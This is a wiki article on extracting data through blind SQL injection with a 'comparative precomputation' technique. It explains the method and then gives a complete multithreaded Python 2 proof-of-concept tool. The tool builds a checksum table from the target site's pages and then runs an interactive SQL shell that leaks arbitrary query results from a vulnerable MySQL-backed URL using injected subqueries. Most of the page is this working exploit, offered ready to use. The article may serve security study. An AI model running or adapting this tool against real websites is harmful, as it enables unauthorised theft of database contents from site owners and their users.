Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"
Revision as of 07:40, 15 November 2012
Response-based data extraction allows blind SQL injection exploitation to retrieve, in some cases, more than a single byte from the remote SQL database.
The author was able to determine that there are at least two ways to perform this task:
- A timing attack, more suited for a LAN (Local Area Network)
- A comparative precomputation attack, more suited for the WAN (Wide Area Network, or in this case, the internet)
This document focuses on the latter, for realistic exploitation demonstration.
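To make the contrast concrete, a timing attack asks the server one yes/no question per request and infers the answer from response latency. The sketch below is purely illustrative (Python 3, with a local function standing in for the vulnerable endpoint; the payload shown in the comment is a typical MySQL form, not taken from this article's target):

```python
import time

def simulated_server(condition_true):
    """Stand-in for a vulnerable endpoint. A payload such as
    ?id=1 AND IF(ascii(substring(version(),1,1))>52, SLEEP(1), 0)
    delays the response only when the guessed condition holds."""
    if condition_true:
        time.sleep(0.2)  # simulates the injected SLEEP()
    return "<html>article</html>"

def condition_holds(condition_true, threshold=0.1):
    # Classify the answer by whether the response took longer than the threshold.
    start = time.time()
    simulated_server(condition_true)
    return time.time() - start > threshold

print(condition_holds(True), condition_holds(False))  # True False
```

On a WAN, network jitter can approach or exceed the injected delay, which is why the comparative precomputation approach tends to travel better over the internet.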
The comparative precomputation attack
This attack relies heavily on the remote dataset for successful exploitation, and thus its rate of data retrieval is more variable than that of other methods.
Requirements:
Precomputation is done for performance and efficiency purposes. At the very least, a comparative test will be required - without precomputation, it is expected that RAM usage may skyrocket. The more complex a remote site is (random content generation, etc.), the more difficult this type of attack becomes to automate.
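The RAM argument can be made concrete: instead of keeping every crawled page in memory for later comparison, the precomputation table only needs a fixed-size digest per page. A minimal sketch (the page body and id are made up for illustration):

```python
import hashlib

# A crawled response of arbitrary size...
page = "<html>" + "x" * 100_000 + "</html>"

# ...collapses to a 16-byte MD5 digest, which becomes the table key.
digest = hashlib.md5(page.encode()).digest()
table = {digest: 1}  # digest -> id that generated the page

print(len(digest))  # 16 bytes per entry, regardless of page size
```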
Theory
The example in this section will rarely (if ever) work in the wild. It is a basic explanation meant to prepare the reader for the more advanced explanation later. (skip to advanced explanation)
- Take the following query
$query = "select * from articles where id=" . $_GET['id'];
- Being executed at the following uri:
/articles.php?id=1
- Assume, for a moment, that the articles table contains 255 rows with sequential ids starting at 1. It will rarely be this way in the wild.
- First, the attacker would crawl all of the pages at ids 1-255, saving them in a hashtable along with the id used to generate each response.
- To determine the ASCII code of the first character of the SQL version, an attacker might visit:
/articles.php?id=ascii(substring(version() from 1 for 1))
The attacker would then take a checksum of the returned HTML and look up the id recorded for that checksum during the initial crawl.
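The steps above can be sketched end to end. The `fetch` function below is a hypothetical stand-in for requesting /articles.php?id=&lt;expr&gt;; a real run would issue HTTP requests against the target instead (Python 3 here for brevity, unlike the Python 2 proof of concept below):

```python
import hashlib

# Stand-in for the remote site: ids 1-255 each yield a distinct page.
ARTICLES = {i: "<html>article %d</html>" % i for i in range(1, 256)}

def fetch(article_id):
    # Hypothetical substitute for an HTTP request to /articles.php?id=...
    return ARTICLES[article_id]

# Step 1: crawl ids 1-255, precomputing checksum -> id.
table = {hashlib.md5(fetch(i).encode()).digest(): i
         for i in range(1, 256)}

# Step 2: the injected expression makes the server render the article
# whose id equals ascii(substring(version() from 1 for 1)).
# For a MySQL 5.x server the first character is '5', ASCII code 53.
leaked_page = fetch(53)  # simulates the injected request
recovered = table[hashlib.md5(leaked_page.encode()).digest()]
print(recovered, chr(recovered))  # 53 5
```

One request thus leaks one byte of the hidden value, at the cost of the 255 requests spent building the table up front.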
Proof of Concept
#!/usr/bin/python2
import sys
import urllib2
import time
from binascii import hexlify
import _mysql
import md5
import pickle
import re
import os
import threading
import Queue
import readline

readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')

BOLD = '\033[1m'
BLUE = '\033[34m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[91m'
ENDC = '\033[0m'


def request(request_url):
    req = urllib2.Request(request_url)
    # Fixed: the original assigned a tuple to req.add_header instead of
    # calling it, so the User-agent header was never actually set.
    req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
    r = urllib2.urlopen(req)
    return r.read()


def construct_discovery_query(url, column, table, counter):
    discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
    discovery = discovery % (column, column, table, counter)
    return url + urllib2.quote(discovery)


def construct_injection_query(url, column, table, query, position):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
    injection = injection % (column, column, table, query, position)
    return url + urllib2.quote(injection)


def get_length(url, column, table, query, ascii_table, counter):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
    length_length = url + urllib2.quote(injection)
    length_length = ascii_table[md5.new(request(length_length)).digest()]
    counter += 1
    length = ""
    for i in range(1, length_length + 1):
        injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))"
        injection = injection % (column, column, table, query, i)
        request_url = url + urllib2.quote(injection)
        length += chr(ascii_table[md5.new(request(request_url)).digest()])
        counter += 1
    return (int(length), counter)


def get_query(prompt):
    while 1:
        query = raw_input(prompt)
        if query != "":
            break
    return query


def do_query(url, column, table, query, ascii_table, i, q):
    tmp = construct_injection_query(url, column, table, query, i)
    q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))


def do_table(url, column, table, i, q):
    tmp = construct_discovery_query(url, column, table, i)
    q.put(md5.new(request(tmp)).digest())


def print_percent(percent, start_time):
    elapsed_time = time.time() - start_time
    eta = ((elapsed_time) / percent) * 100 - elapsed_time
    sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
    sys.stdout.flush()


def do_thread(target, args, counter, length, type_query):
    if type_query == 0:
        ascii_table = {}
    else:
        query_result = ""
    if type_query == 0:
        i = 0
    else:
        i = 1
    sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
    sys.stdout.flush()
    start_time = time.time()
    while i < length:
        threads = {}
        queues = []
        for j in range(0, 11):
            if i < length:
                queues.append(Queue.Queue())
                threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
                i += 1
                counter += 1
                print_percent(100 * float(i) / float(length), start_time)
        for thread in threads:
            threads[thread].start()
        for j, thread in enumerate(sorted(threads.iterkeys())):
            if type_query == 0:
                ascii_table[queues[j].get()] = thread
            else:
                query_result += queues[j].get()
            threads[thread].join()
    sys.stdout.write('\n')
    sys.stdout.flush()
    if type_query == 0:
        return ascii_table
    else:
        return (counter, query_result)


def main(url, column, table):
    session_name = re.split("(https?://)?(.*)/", url)[2]
    print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
    try:
        try:
            os.stat("data")
        except:
            os.mkdir("data")
        ascii_table = pickle.load(open("data/%s" % session_name, "rb"))
        print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
    except:
        print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
        current = time.time()
        ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
        pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
        print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
    print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
    while 1:
        query = get_query("%ssql shell>%s " % (BOLD, ENDC))
        if query == "exit":
            break
        query_result = ""
        counter = 0
        current = time.time()
        (length, counter) = get_length(url, column, table, query, ascii_table, counter)
        (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length + 1, 1)
        query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
        mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
        mysql_connection.query(query)
        result = mysql_connection.use_result()
        data = result.fetch_row()[0][0]
        mysql_connection.close()
        print data
        print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
    print "%s[*]%s Good bye" % (GREEN, ENDC)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
        exit()
    print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
    main(sys.argv[1], sys.argv[2], sys.argv[3])
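The script compresses the query result server-side (`compress((...))`) to cut the request count, then hands the recovered bytes back to a local MySQL `UNCOMPRESS()` for inflation. The same unwrapping can be done without a local MySQL instance, since MySQL's `COMPRESS()` output is a 4-byte little-endian uncompressed length followed by a zlib stream. A sketch of that format (the version string is an example value, not output from a real target):

```python
import struct
import zlib

def mysql_compress(data):
    # Mimics MySQL COMPRESS(): 4-byte little-endian length + zlib body.
    return struct.pack("<I", len(data)) + zlib.compress(data)

def mysql_uncompress(blob):
    # Mimics MySQL UNCOMPRESS(): verify the declared length, inflate the rest.
    declared = struct.unpack("<I", blob[:4])[0]
    data = zlib.decompress(blob[4:])
    assert len(data) == declared
    return data

blob = mysql_compress(b"5.5.28-log")
print(mysql_uncompress(blob))  # b'5.5.28-log'
```

This would let the proof of concept drop its `_mysql.connect('localhost', ...)` dependency entirely, at the cost of reimplementing the wrapper locally.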